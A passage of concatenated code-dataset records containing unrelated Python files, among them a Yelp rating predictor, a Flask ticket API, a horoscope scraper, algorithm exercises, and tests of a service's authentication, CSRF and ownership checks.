default_business):\n output = {}\n 
user_review_count = []\n user_userful = []\n user_stars = []\n user_fans = []\n business_review_count = []\n business_stars = []\n business_noise = []\n business_wifi = []\n for user in data['user_id']:\n if user in user_map.keys():\n user_review_count.append(user_map.get(user)[0])\n user_userful.append(user_map.get(user)[1])\n user_stars.append(user_map.get(user)[2])\n user_fans.append(user_map.get(user)[3])\n else:\n user_review_count.append(default_user['review_count'])\n user_userful.append(default_user['userful'])\n user_stars.append(default_user['stars'])\n user_fans.append(default_user['fans'])\n for business in data['business_id']:\n if business in business_map.keys():\n business_review_count.append(business_map.get(business)[1])\n business_stars.append(business_map.get(business)[0])\n business_noise.append(business_map.get(business)[2])\n business_wifi.append(business_map.get(business)[3])\n else:\n business_review_count.append(default_business['review_count'])\n business_stars.append(default_business['stars'])\n business_noise.append(default_business['noise'])\n business_wifi.append(default_business['wifi'])\n\n output['user_review_count'] = user_review_count\n output['useful'] = user_userful\n output['user_stars'] = user_stars\n output['fans'] = user_fans\n output['business_review_count'] = business_review_count\n output['business_stars'] = business_stars\n output['noise'] = business_noise\n output['wifi'] = business_wifi\n\n return output\n\n\ndef competition(folder_path, test_file_name, output_file_name):\n\n start_time = time.time()\n # folder_path = 'data/'\n # test_file_name = 'yelp_val.csv'\n # output_file_name = 'task2_2.csv'\n train_file = os.path.join(folder_path, 'yelp_train.csv')\n user_json_path = os.path.join(folder_path, 'user.json')\n business_json_path = os.path.join(folder_path, 'business.json')\n\n conf = SparkConf().setAppName(\"DSCI553\").setMaster('local[*]')\n sc = SparkContext(conf=conf)\n sc.setLogLevel(\"ERROR\")\n\n train_data = pd.read_csv(train_file)\n test_data = pd.read_csv(test_file_name)\n\n user_json_rdd = sc.textFile(user_json_path). \\\n map(json.loads). \\\n map(lambda x: ((x[\"user_id\"]), (x[\"review_count\"], x[\"useful\"], x[\"average_stars\"], x[\"fans\"]))). 
\\\n persist()\n user_json_dict = user_json_rdd.collectAsMap()\n\n business_json_rdd = sc.textFile(business_json_path) \\\n .map(json.loads) \\\n .map(lambda x: ((x['business_id']), (x['stars'], x['review_count'], get_noise_level(x['attributes']), have_wifi(x['attributes'])))) \\\n .persist()\n business_json_dict = business_json_rdd.collectAsMap()\n\n default_user = {'review_count': user_json_rdd.map(lambda x: x[1][0]).mean(),\n 'userful': 0,\n 'stars': user_json_rdd.map(lambda x: x[1][2]).mean(),\n \"fans\": user_json_rdd.map(lambda x: x[1][3]).mean()}\n default_business = {'review_count': business_json_rdd.map(lambda x: x[1][1]).mean(),\n 'stars': business_json_rdd.map(lambda x: x[1][0]).mean(),\n 'noise': business_json_rdd.map(lambda x: x[1][2]).mean(),\n \"wifi\": business_json_rdd.map(lambda x: x[1][3]).mean()}\n training_data = pd.DataFrame.from_dict(\n get_data(train_data, user_json_dict, business_json_dict, default_user, default_business))\n trainX = np.array(training_data)\n trainY = train_data.stars.values\n\n xgbr = xgb.XGBRegressor(seed=20)\n xgbr.fit(trainX, trainY)\n\n testing_data = pd.DataFrame.from_dict(\n get_data(test_data, user_json_dict, business_json_dict, default_user, default_business))\n testX = np.array(testing_data)\n testY = test_data.stars.values\n prediction = xgbr.predict(testX)\n\n result = pd.DataFrame()\n result[\"user_id\"] = test_data.user_id.values\n result[\"business_id\"] = test_data.business_id.values\n result[\"prediction\"] = prediction\n result.to_csv(output_file_name, header=['user_id', 'business_id', 'prediction'], index=False, sep=',', mode='w')\n\n print(\"Duration: \", time.time() - start_time)\n\n\nfolder_path, test_file_name, output_file_name = sys.argv[1], sys.argv[2], sys.argv[3]\ncompetition(folder_path, test_file_name, output_file_name)\n\n","repo_name":"Ryan-USC/DSCI553","sub_path":"competition/competition.py","file_name":"competition.py","file_ext":"py","file_size_in_byte":6031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29285481887","text":"from copy import deepcopy\nfrom typing import Any, List, Tuple\n\n\ndef dummy_async_context_manager(value):\n class _Inner:\n async def __aenter__(self):\n return value\n\n async def __aexit__(self, *args):\n pass\n\n async def _await_mock(self):\n return value\n\n def __await__(self):\n return self._await_mock().__await__()\n\n return _Inner()\n\n\ndef dummy_async_function(result=None, exc=None, calls=[]):\n async def _inner(*args, **kwargs):\n nonlocal calls\n calls.append((args, kwargs))\n\n if exc:\n raise exc\n return result\n\n return _inner\n\n\ndef locate_key(d: dict, locator: str) -> Tuple[dict, str]:\n ref = d\n last_part, *path = locator.split('.')\n for part in path:\n ref.setdefault(last_part, {})\n ref = ref[last_part]\n last_part = part\n return ref, last_part\n\n\ndef remove_keys(d: dict, *keys: List[str]) -> dict:\n d = deepcopy(d)\n for locator in keys:\n ref, key = locate_key(d, locator)\n del ref[key]\n return d\n\n\ndef set_key(d: dict, locator: str, value: Any) -> dict:\n d = deepcopy(d)\n ref, key = locate_key(d, locator)\n ref[key] = value\n return d\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"pay/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"75042395281","text":"\"\"\"\nMake a standard deck of cards, shuffle the deck, and then draw two cards 
at\nrandom. Print the two cards.\n\"\"\"\n\nfrom random import choice, shuffle\n\nRANKS = tuple(\"2345678910\") + (\"Jack\", \"Queen\", \"King\", \"Ace\")\nSUITS = (\"Diamonds\", \"Hearts\", \"Clubs\", \"Spades\")\ncards = [f\"{rank} of {suit}\" for rank in RANKS for suit in SUITS]\nshuffle(cards)\n\nfirst_card = choice(cards)\ncards.remove(first_card)\nprint(\"Your first card is the\", first_card)\n\nsecond_card = choice(cards)\ncards.remove(second_card)\nprint(\"\\nYour second card is the\", second_card)\n","repo_name":"Dagonite/python-exercises","sub_path":"Exercises/E02_Medium/E07_Playing_Cards/draw_cards_from_deck.py","file_name":"draw_cards_from_deck.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18331107951","text":"import sys\nimport math\nfrom collections import defaultdict\nfrom collections import deque\n\nsys.setrecursionlimit(1000000)\nMOD = 10 ** 9 + 7\ninput = lambda: sys.stdin.readline().strip()\nNI = lambda: int(input())\nNMI = lambda: map(int, input().split())\nNLI = lambda: list(NMI())\nSI = lambda: input()\n\n\ndef main():\n N = NI()\n TA = [NLI() for _ in range(N)]\n nt, na = 0, 0\n for t, a in TA:\n if t >= nt and a >= na:\n nt = t\n na = a\n elif t >= nt and a < na:\n k = na // a if na % a == 0 else na // a + 1\n nt = k*t\n na = k*a\n elif t < nt and a >= na:\n k = nt // t if nt % t == 0 else nt // t + 1\n nt = k*t\n na = k*a\n else:\n kt = nt // t if nt % t == 0 else nt // t + 1\n ka = na // a if na % a == 0 else na // a + 1\n k = max(kt, ka)\n nt = k * t\n na = k * a\n print(nt+na)\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Mao-beta/AtCoder","sub_path":"ARC/ARC062/ARC062/ARC062C.py","file_name":"ARC062C.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16444825988","text":"from flask import jsonify, request\nfrom flask.blueprints import Blueprint\n\nfrom main.service.tareas_service import crear_tarea, eliminar_asociaciones\nfrom main.service.tickets_service import (archivar, crear, editar,\n obtener_ticket_por, obtener_data_diaria,\n\t\t\t\t\t\t\t\t\t\t obtener_data_acumulada)\nfrom main.service.tickets_service import \\\n obtener_tickets as obtener_tickets_service\nfrom main.settings import CODIGO_HTTP\n\ntickets = Blueprint('tickets', __name__)\n\n\n@tickets.route('/tickets', methods=['GET'])\ndef obtener_tickets():\n\tquery_params = request.args\n\n\trespuesta = obtener_tickets_service(query_params)\n\n\treturn jsonify(respuesta), CODIGO_HTTP[\"OK\"]\n\n@tickets.route('/tickets/', methods=['GET'])\ndef obtener_ticket(id):\n\ttry:\n\t\tticket = obtener_ticket_por(id)\n\t\treturn jsonify(ticket), CODIGO_HTTP[\"OK\"]\n\texcept:\n\t\treturn jsonify({'mensaje': 'Ticket no encontrado'}), CODIGO_HTTP[\"BAD_REQUEST\"]\n\n@tickets.route('/tickets', methods=['POST'])\ndef crear_ticket():\n\ttry:\n\t\tdata = request.get_json()\n\t\tnombre = data['nombre']\n\t\tdescripcion = data['descripcion']\n\t\ttipo = data['tipo'].lower()\n\t\tseveridad = data['severidad'].lower()\n\t\tid_cliente = data['cliente']['id']\n\texcept:\n\t\treturn jsonify({'mensaje': 'Parametros invalidos'}), CODIGO_HTTP[\"BAD_REQUEST\"]\n\t\n\ttry:\n\t\tticket = crear(data)\n\n\t\treturn jsonify(ticket), CODIGO_HTTP[\"OK\"]\n\texcept Exception as e:\n\t\treturn jsonify({'mensaje': str(e)}), CODIGO_HTTP[\"BAD_REQUEST\"]\n\n@tickets.route('/tickets/', methods=['PUT'])\ndef 
editar_ticket(id_ticket):\n\n\ttry:\n\t\tdata = request.get_json()\n\t\tnombre = data['nombre']\n\t\tdescripcion = data['descripcion']\n\t\ttipo = data['tipo'].lower()\n\t\testado = data['estado'].lower()\n\t\tseveridad = data['severidad'].lower()\n\t\tid_cliente = data['cliente']['id']\n\texcept:\n\t\treturn jsonify({'mensaje': 'Parametros invalidos'}), CODIGO_HTTP[\"BAD_REQUEST\"]\n\n\ttry:\n\t\teditar(id_ticket, data)\n\t\treturn jsonify(), CODIGO_HTTP[\"NO_CONTENT\"]\n\texcept Exception as e:\n\t\treturn jsonify({'mensaje': str(e)}), CODIGO_HTTP[\"BAD_REQUEST\"]\n\n\n@tickets.route('/tickets/', methods=['DELETE'])\ndef archivar_ticket(id_ticket):\n\ttry:\n\t\tarchivar(id_ticket)\n\t\treturn jsonify({'mensaje': 'Ticket archivado con exito!'}), CODIGO_HTTP[\"OK\"]\n\texcept Exception as e:\n\t\treturn jsonify({'mensaje': str(e)}), CODIGO_HTTP[\"BAD_REQUEST\"]\n\n@tickets.route('/tickets//tareas', methods=['POST'])\ndef crear_tarea_derivada(id_ticket):\n\ttry:\n\t\tdata = request.get_json()\n\n\t\tcrear_tarea(data, id_ticket)\n\t\t# ('No existe el ticket solicitado'), CODIGO_HTTP[\"NOT_FOUND\"]\n\n\t\treturn jsonify({'mensaje': \"Tarea asociada a ticket exitosamente\"}), CODIGO_HTTP[\"OK\"]\n\texcept Exception as e:\n\t\treturn jsonify({'mensaje': str(e)}), CODIGO_HTTP[\"BAD_REQUEST\"]\n\n@tickets.route('/tickets/data_diaria', methods=['GET'])\ndef data_diaria():\n\ttickets_cerrados, tickets_abiertos = obtener_data_diaria()\n\treturn {'tickets_cerrados' : tickets_cerrados, 'tickets_abiertos' : tickets_abiertos}\n\n\n\n@tickets.route('/tickets/data_acumulada', methods=['GET'])\ndef data_acumulada():\n\treturn jsonify(obtener_data_acumulada())\n\n\n@tickets.route('/tickets/tareas/', methods=['DELETE'])\ndef eliminar_asociaciones_ticket(id_tarea):\n\teliminar_asociaciones(id_tarea)\n\treturn jsonify({'mensaje': 'Tickets desasociados con exito'}), CODIGO_HTTP[\"OK\"]","repo_name":"eprediger/psa-support","sub_path":"app/main/controller/tickets_controller.py","file_name":"tickets_controller.py","file_ext":"py","file_size_in_byte":3361,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27019517345","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# @Author : 1230\n# @Email : xjh_0125@sina.com\n# @Time : 2019/12/23 16:30\n# @Software: PyCharm\n# @File : maximum_heap.py\n\nclass Solution:\n def __init__(self):\n '''\n\n '''\n self.arr = []\n self.k = 0\n\n def build_heap(self):\n count = len(self.arr) // 2\n for i in range(count, -1, -1):\n self.heapify(self.arr, len(self.arr), i)\n\n def heapify(self, arr, heap_size, pos):\n '''\n 构建最小堆 跟节点最小,左子树大于右子树\n 按照索引排\n 0\n 1 * 2\n 3 4 * 5 6\n :param arr:生成堆的源数组\n :param heap_size: 堆大小 小于等于len(arr)\n :param pos:堆顶点位置\n :return:\n '''\n count, l, r = heap_size, pos * 2 + 1, pos * 2 + 2\n while l < count or r < count:\n largest = l\n if r < count and arr[l] > arr[r]:\n largest = r\n if arr[pos] <= arr[largest]:\n break\n else:\n self.swap(arr, pos, largest)\n pos = largest # 此时largest为左或右子树,再遍历当前节点的左右子树\n l = pos * 2 + 1\n r = pos * 2 + 2\n\n def swap(self, arr, i, j):\n arr[i], arr[j] = arr[j], arr[i]\n\n def insert(self, val):\n if self.arr[0] < val:\n self.arr[0] = val\n self.build_heap()\n\n def findKthLargest(self, nums, k: int) -> int:\n self.k = k\n self.arr = nums[:k]\n self.build_heap()\n for i in nums[k:]:\n self.insert(i)\n return self.arr[0]\n\n\nif __name__ == '__main__':\n s = Solution()\n arr = [3, 2, 3, 1, 2, 4, 5, 5, 6]\n k = 4\n res = s.findKthLargest(arr, k)\n print(res, 
s.arr)\n","repo_name":"xjh1230/py_algorithm","sub_path":"data_structure/maximum_heap.py","file_name":"maximum_heap.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"918151367","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\"),\n path(\"new\", views.add_listing, name=\"add\"),\n path(\"listing/\", views.listing, name=\"listing\"),\n path(\"watchlist/\", views.watchlist, name=\"watchlist\"),\n path(\"bid\", views.bid, name=\"bid\"),\n path(\"close\", views.closeauction, name=\"close\"),\n path(\"comment\", views.comment, name=\"comment\"),\n path(\"categories\", views.categories, name=\"categories\")\n]\n","repo_name":"Rehtest/CS50WCommerce","sub_path":"auctions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71204825362","text":"\"\"\"\ncalculate priorties from index and proximities\n\"\"\"\nimport argparse\nfrom random import shuffle\nfrom collections import defaultdict\nimport numpy as np\nimport pandas as pd\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description=\"generate priorities files based on genetic proximity to focal sample\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n parser.add_argument(\"--sequence-index\", type=str, required=True, help=\"sequence index file\")\n parser.add_argument(\"--proximities\", type = str, required=True, help=\"tsv file with proximities\")\n parser.add_argument(\"--Nweight\", type = float, default=0.003, required=False, help=\"parameterizes de-prioritization of incomplete sequences\")\n parser.add_argument(\"--crowding-penalty\", type = float, default=0.1, required=False, help=\"parameterizes how priorities decrease when there is many very similar sequences\")\n parser.add_argument(\"--output\", type=str, required=True, help=\"tsv file with the priorities\")\n args = parser.parse_args()\n\n proximities = pd.read_csv(args.proximities, sep='\\t', index_col=0)\n index = pd.read_csv(args.sequence_index, sep='\\t', index_col=0)\n combined = pd.concat([proximities, index], axis=1)\n\n closest_matches = combined.groupby('closest strain')\n candidates = {}\n for focal_seq, seqs in closest_matches.groups.items():\n tmp = combined.loc[seqs, [\"distance\", \"N\"]]\n # penalize larger distances and more undetermined sites. 
1/args.Nweight are 'as bad' as one extra mutation\n tmp[\"priority\"] = -tmp.distance - tmp.N*args.Nweight\n name_prior = [(name, d.priority) for name, d in tmp.iterrows()]\n shuffle(name_prior)\n candidates[focal_seq] = sorted(name_prior, key=lambda x:x[1], reverse=True)\n\n # export priorities\n crowding = args.crowding_penalty\n with open(args.output, 'w') as fh:\n # loop over lists of sequences that are closest to particular focal sequences\n for cs in candidates.values():\n # these sets have been sorted by priorities after shuffling -- reduce priorities in this shuffled/sorted order\n for i, (name, pr) in enumerate(cs):\n fh.write(f\"{name}\\t{pr-i*crowding:1.2f}\\n\")\n","repo_name":"nextstrain/ncov","sub_path":"scripts/priorities.py","file_name":"priorities.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":1348,"dataset":"github-code","pt":"3"} +{"seq_id":"8390266753","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\ndef result_process(data_list):\n texts = ''\n\n for item in data_list:\n for i in item:\n texts += str(*i, )\n\n texts = texts.split('\\n')\n\n return texts\n\n\ndef get_personal_horoscope_by_day_and_tomorrow(zodiac_sign: str, day='today'):\n try:\n res = requests.get(f\"https://horo.mail.ru/prediction/{zodiac_sign}/{day}/\")\n soup = BeautifulSoup(res.content, 'html.parser')\n list_data = soup.find_all('div', attrs={'class': 'article__item article__item_alignment_left article__item_html'})\n\n group_texts_1 = ''\n group_texts_2 = ''\n\n all_text = []\n delimiter = 0\n\n if list_data:\n texts = result_process(list_data)\n\n for i in range(len(texts)):\n if i == delimiter:\n group_texts_1 += texts[i] + ' '\n else:\n group_texts_2 += texts[i] + ' '\n\n all_text.append(group_texts_1[:-1])\n all_text.append(group_texts_2[:-1])\n else:\n return None\n\n return all_text\n\n except requests.exceptions.ConnectionError:\n return None\n\n\ndef get_personal_horoscope_by_week_and_month(zodiac_sign: str, day='week'):\n try:\n res = requests.get(f\"https://horo.mail.ru/prediction/{zodiac_sign}/{day}/\")\n soup = BeautifulSoup(res.content, 'html.parser')\n data_list = soup.find_all('div', attrs={'class': 'article__item article__item_alignment_left article__item_html'})\n\n group_texts_1 = ''\n group_texts_2 = ''\n group_texts_3 = ''\n\n all_text = []\n delimiter = 0\n sentence_limit = 3\n\n if data_list:\n texts = result_process(data_list)\n sentences = len(texts)\n\n for i in range(sentences):\n if day == 'month':\n if sentences == sentence_limit:\n if i == delimiter:\n group_texts_1 += texts[i] + ' '\n elif i == delimiter + 1 or i == delimiter + 2:\n group_texts_2 += texts[i] + ' '\n else:\n group_texts_3 += texts[i] + ' '\n else:\n if i == delimiter:\n group_texts_1 += texts[i] + ' '\n elif i == delimiter + 1:\n group_texts_2 += texts[i] + ' '\n else:\n group_texts_3 += texts[i] + ' '\n else:\n if i == delimiter:\n group_texts_1 += texts[i] + ' '\n else:\n group_texts_2 += texts[i] + ' '\n\n all_text.append(group_texts_1)\n all_text.append(group_texts_2)\n\n if group_texts_3 != '':\n all_text.append(group_texts_3)\n else:\n return None\n\n return all_text\n\n except requests.exceptions.ConnectionError:\n return None\n","repo_name":"IlyaCherevachenko/Web-site-Horoscope-","sub_path":"parcer/parcing_personal_horoscope.py","file_name":"parcing_personal_horoscope.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} 
+{"seq_id":"29173620927","text":"\"\"\"Tests authorization.\"\"\"\n\nimport http.client\n\nimport pytest\n\nfrom infra.walle.server.tests.lib.util import MonkeyPatch, patch, monkeypatch_config, monkeypatch_method, TestCase\nfrom sepelib.core import config\nfrom walle.application import app\nfrom walle.authorization import csrf, blackbox\nfrom walle.clients import staff\nfrom walle.errors import UnauthorizedError\nfrom walle.hosts import HostUnderMaintenanceError, HostState\nfrom walle.util.api import api_handler, admin_request, api_response\n\n\n@pytest.fixture(autouse=True, scope=\"module\")\ndef test(request):\n monkeypatch = MonkeyPatch()\n request.addfinalizer(monkeypatch.undo)\n\n # Required by api_handler decorator\n monkeypatch.setattr(app, \"flask\", None)\n monkeypatch.setattr(app, \"_Application__services\", None)\n monkeypatch.setattr(app, \"_Application__logging_initialized\", None)\n monkeypatch.setattr(TestCase, \"_app_initialized\", False)\n app.init_flask()\n\n with app.init_blueprint(\"api\", \"/v1\") as mock_api_blueprint:\n app.api_blueprint = mock_api_blueprint\n create_handlers()\n\n # these are special kind of tests that test on handlers instead of those registered in api.\n # stub blueprint creating to keep thing untouched after this test finishes.\n monkeypatch_method(monkeypatch, app.setup_api_blueprint)\n monkeypatch_method(monkeypatch, app.setup_cms_api_blueprint)\n monkeypatch_method(monkeypatch, app.setup_metrics_blueprint)\n\n\ndef create_handlers():\n @api_handler(\"/test/authentication\", \"GET\")\n def unauthorized_handler():\n return api_response({\"status\": \"unauthenticated\"})\n\n @api_handler(\n \"/test/authentication\",\n (\"OPTION\", \"POST\"),\n {\n \"type\": \"object\",\n \"properties\": {},\n \"additionalProperties\": False,\n },\n authenticate=True,\n )\n def authenticated_handler(issuer, request=None):\n return api_response({\"status\": \"authenticated\", \"issuer\": issuer})\n\n @api_handler(\n \"/test/admin_authorization\",\n \"POST\",\n {\n \"type\": \"object\",\n \"properties\": {},\n \"additionalProperties\": False,\n },\n authenticate=True,\n )\n @admin_request\n def authorized_admin_handler(issuer, request):\n return api_response({\"status\": \"authorized_admin\", \"issuer\": issuer})\n\n\n@pytest.fixture\ndef clear_auth_cache():\n blackbox._AUTHENTICATION_FALLBACK_CACHE.clear()\n blackbox._AUTHENTICATION_HOT_CACHE.clear()\n\n\ndef test_unauthenticated(walle_test, iterate_authentication):\n result = walle_test.api_client.get(\"/v1/test/authentication\")\n assert result.status_code == http.client.OK\n assert result.json == {\"status\": \"unauthenticated\"}\n\n\n@patch(\n \"walle.authorization.blackbox.authenticate\", return_value=blackbox.AuthInfo(issuer=\"issuer-mock\", session_id=None)\n)\ndef test_authenticated_ok(authenticate, walle_test):\n result = walle_test.api_client.post(\"/v1/test/authentication\", data={})\n assert result.status_code == http.client.OK\n assert result.json == {\"status\": \"authenticated\", \"issuer\": \"issuer-mock\"}\n authenticate.assert_called_once_with(config.get_value(\"oauth.client_id\"))\n\n\ndef test_authentication_failure(walle_test, unauthenticated):\n result = walle_test.api_client.post(\"/v1/test/authentication\", data={})\n assert result.status_code == http.client.UNAUTHORIZED\n unauthenticated.assert_called_once_with(config.get_value(\"oauth.client_id\"))\n\n\n@patch(\"walle.authorization.blackbox.authenticate\", side_effect=blackbox._authenticate_cached)\ndef 
test_authentication_blackbox_request_failure(authenticate, walle_test, clear_auth_cache):\n with patch(\n \"walle.authorization.blackbox._authenticate\", side_effect=blackbox.BlackBoxCommunicationError(\"Mocked Error\")\n ):\n result = walle_test.api_client.post(\"/v1/test/authentication\", data={}, headers={\"Authorization\": \"\"})\n assert result.status_code == http.client.INTERNAL_SERVER_ERROR\n assert result.json[\"message\"] == \"Internal error occurred: Error in communication with blackbox: Mocked Error\"\n assert result.json[\"result\"] == \"FAIL\"\n\n\n@patch(\"walle.authorization.blackbox.authenticate\", side_effect=blackbox._authenticate_cached)\n@pytest.mark.parametrize(\"header_value\", [\"OAuth\", \"OAuth \"])\ndef test_authentication_blackbox_request_invalid_header(authenticate, walle_test, clear_auth_cache, header_value):\n result = walle_test.api_client.post(\"/v1/test/authentication\", data={}, headers={\"Authorization\": header_value})\n assert result.status_code == http.client.UNAUTHORIZED\n assert result.json[\"message\"] == \"Authentication failed: Authentication failed: Authorization token is empty\"\n assert result.json[\"result\"] == \"FAIL\"\n\n\n@patch(\"walle.authorization.blackbox.authenticate\", side_effect=blackbox._authenticate_cached)\ndef test_authentication_blackbox_request_cache_fallback(authenticate, walle_test, clear_auth_cache):\n side_effects = [\n blackbox.AuthInfo(issuer=walle_test.api_issuer, session_id=None),\n blackbox.BlackBoxCommunicationError(\"Mocked Error\"),\n ]\n\n with patch(\"walle.authorization.blackbox._authenticate\", side_effect=side_effects):\n for _ in (1, 2):\n result = walle_test.api_client.post(\"/v1/test/authentication\", data={}, headers={\"Authorization\": \"\"})\n assert result.status_code == http.client.OK\n assert result.json == {\"status\": \"authenticated\", \"issuer\": walle_test.api_issuer}\n\n\n@patch(\"walle.authorization.blackbox.authenticate\", side_effect=blackbox._authenticate_cached)\ndef test_csrf_ok(authenticate, walle_test, mp, clear_auth_cache):\n monkeypatch_config(mp, \"authorization.csrf_key\", \"0000\")\n session_id = \"6a37bb251c8590267ec03770125ae5271a8c74c9\"\n valid_csrf_token = csrf.get_csrf_token(session_id)\n session_header = \"Session_id={}; Domain=localhost; Path=/\".format(session_id)\n\n with patch(\"walle.authorization.blackbox._authenticate\", return_value=(walle_test.api_issuer, session_id)):\n for method in (\"GET\", \"OPTION\", \"POST\"):\n result = walle_test.api_client.open(\n \"/v1/test/authentication\",\n method=method,\n data={},\n headers={\"X-CSRF-TOKEN\": valid_csrf_token, \"Cookie\": session_header},\n )\n assert result.status_code == http.client.OK\n\n\n@patch(\"walle.authorization.blackbox.authenticate\", side_effect=blackbox._authenticate_cached)\ndef test_csrf_fail(authenticate, walle_test, mp, clear_auth_cache):\n monkeypatch_config(mp, \"authorization.csrf_key\", \"0000\")\n session_id = \"6a37bb251c8590267ec03770125ae5271a8c74c9\"\n session_header = \"Session_id={}; Domain=localhost; Path=/\".format(session_id)\n\n with patch(\n \"walle.authorization.blackbox._authenticate\",\n side_effect=[\n (walle_test.api_issuer, session_id),\n # these does not affect the result, auth was cached after the first GET request.\n blackbox.UnauthenticatedError(\"Mock CSRF token error\"),\n blackbox.UnauthenticatedError(\"Mock CSRF token error\"),\n ],\n ):\n for method, code in ((\"GET\", http.client.OK), (\"OPTION\", http.client.OK), (\"POST\", http.client.UNAUTHORIZED)):\n result = 
walle_test.api_client.open(\n \"/v1/test/authentication\",\n method=method,\n data={},\n headers={\"X-CSRF-TOKEN\": \"INVALID TOKEN\", \"Cookie\": session_header},\n )\n assert result.status_code == code\n\n\ndef test_admin_authorization_ok(walle_test, authorized_admin):\n result = walle_test.api_client.post(\"/v1/test/admin_authorization\", data={})\n assert result.status_code == http.client.OK\n assert result.json == {\"status\": \"authorized_admin\", \"issuer\": walle_test.api_issuer}\n\n\ndef test_admin_authorization_failure(walle_test):\n result = walle_test.api_client.post(\"/v1/test/admin_authorization\", data={})\n assert result.status_code == http.client.FORBIDDEN\n\n\n@patch(\"walle.clients.staff.get_user_groups\", return_value={\"@group1\", \"@group2\"})\ndef test_project_authorization(get_user_groups, walle_test, mp):\n project = walle_test.mock_project({\"id\": \"some-id\", \"owners\": [\"owner0\", \"owner1\"]})\n project.authorize(\"owner1@\")\n\n with pytest.raises(UnauthorizedError):\n project.authorize(\"owner2@\")\n\n monkeypatch_config(mp, \"authorization.admins\", [\"owner2\"])\n project.authorize(\"owner2@\")\n\n\n@patch(\"walle.clients.staff.get_user_groups\", return_value={\"@group1\", \"@group2\"})\ndef test_project_authorization_by_group(get_user_groups, walle_test):\n project1 = walle_test.mock_project({\"id\": \"some-id-1\", \"owners\": [\"owner1\", \"@group1\"]})\n project2 = walle_test.mock_project({\"id\": \"some-id-2\", \"owners\": [\"owner1\", \"@group3\"]})\n\n project1.authorize(\"owner1@\")\n project1.authorize(\"owner2@\")\n\n project2.authorize(\"owner1@\")\n with pytest.raises(UnauthorizedError):\n project2.authorize(\"owner2@\")\n\n\nclass TestHostAuthorization:\n @pytest.fixture(params=[\"owner1@\", \"owner2@\", None])\n def host(self, request, walle_test, mp):\n mp.function(staff.get_user_groups, return_value={\"@group1\", \"@group2\"})\n project = walle_test.mock_project({\"id\": \"some-id\", \"owners\": [\"owner0\", \"owner1\"]})\n host = walle_test.mock_host({\"project\": project.id, \"status_author\": request.param})\n return host\n\n @pytest.mark.parametrize(\"ignore_maintenance\", [True, False])\n def test_allows_explicit_owners(self, host, ignore_maintenance):\n host.authorize(\"owner1@\", ignore_maintenance=ignore_maintenance)\n\n @pytest.mark.parametrize(\"ignore_maintenance\", [True, False])\n def test_raises_on_member_not_in_owners(self, host, ignore_maintenance):\n with pytest.raises(UnauthorizedError):\n host.authorize(\"owner2@\", ignore_maintenance=ignore_maintenance)\n\n @pytest.mark.parametrize(\"ignore_maintenance\", [True, False])\n def test_raises_on_admins_not_in_owners(self, mp, host, ignore_maintenance):\n monkeypatch_config(mp, \"authorization.admins\", [\"owner2\"])\n with pytest.raises(UnauthorizedError):\n host.authorize(\"owner2@\", ignore_maintenance=ignore_maintenance)\n\n\n@patch(\"walle.clients.staff.get_user_groups\", return_value={\"@group1\", \"@group2\"})\ndef test_host_under_maintenance(get_user_groups, walle_test, mp):\n project = walle_test.mock_project({\"id\": \"some-id\", \"owners\": [\"owner0\", \"owner1\"]})\n host1 = walle_test.mock_host(\n {\"inv\": 1, \"project\": project.id, \"state\": HostState.MAINTENANCE, \"state_author\": \"owner0@\"}\n )\n host2 = walle_test.mock_host(\n {\"inv\": 2, \"project\": project.id, \"state\": HostState.MAINTENANCE, \"state_author\": None}\n )\n\n monkeypatch_config(mp, \"authorization.admins\", [\"owner0\", \"owner1\"])\n\n # Host is under maintenance, authorizing it's 
owner\n host1.authorize(\"owner0@\", ignore_maintenance=False)\n host1.authorize(\"owner0@\", ignore_maintenance=True)\n\n # Host is not under maintenance, no state owner\n host2.authorize(\"owner0@\", ignore_maintenance=False)\n host2.authorize(\"owner0@\", ignore_maintenance=True)\n\n with pytest.raises(HostUnderMaintenanceError):\n host1.authorize(\"owner1@\", ignore_maintenance=False)\n\n # Host is under maintenance, authorizing with force\n host1.authorize(\"owner1@\", ignore_maintenance=True)\n\n # Host is not under maintenance, no state owner\n host2.authorize(\"owner1@\", ignore_maintenance=True)\n host2.authorize(\"owner1@\", ignore_maintenance=False)\n\n\n@patch(\"walle.clients.staff.get_user_groups\", return_value={\"@group1\", \"@group2\"})\ndef test_host_authorization_by_group(get_user_groups, walle_test):\n project1 = walle_test.mock_project({\"id\": \"some-id-1\", \"owners\": [\"owner1\", \"@group1\"]})\n host1 = walle_test.mock_host({\"project\": project1.id, \"inv\": 1})\n\n project2 = walle_test.mock_project({\"id\": \"some-id-2\", \"owners\": [\"owner1\", \"@group3\"]})\n host2 = walle_test.mock_host({\"project\": project2.id, \"inv\": 2})\n\n host1.authorize(\"owner1@\", ignore_maintenance=False)\n host1.authorize(\"owner2@\", ignore_maintenance=False)\n\n host2.authorize(\"owner1@\", 